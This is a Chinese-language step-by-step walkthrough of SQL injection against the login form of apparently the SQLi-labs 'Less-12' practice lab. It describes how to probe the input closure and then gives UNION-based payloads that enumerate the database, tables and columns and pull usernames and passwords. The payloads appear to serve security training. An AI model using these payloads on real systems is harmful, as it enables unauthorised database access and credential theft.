1、访问首页,/Less-12/index.php,这里的传参点是表单中的uname、passwd
探测六步
- 判断是否是数字形传参
- 判断是否有单引号闭合
- 判断是否是双引号闭合
- 判断是否单引号+括号闭合
- 判断是否是双引号+括号闭合
- 判断是否是延时盲注
2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。
admin") order by 3-- qwe
3、查看SQL结果显示点
") union select 1,2-- qwe
4、查询库名及库版本信息
") union select database(),version() -- qwe
5、查询表名
") union select table_name,2 from information_schema.tables where table_schema=database() limit 3,1-- qwe
6、查询字段名
") union select column_name,2 from information_schema.columns where table_name='users' limit 1,1-- qwe
或
") union select column_name,2 from information_schema.columns where table_name=0x7573657273 limit 1,1-- qwe
7、查询数据
") union select username,password from users limit 1,1-- qwe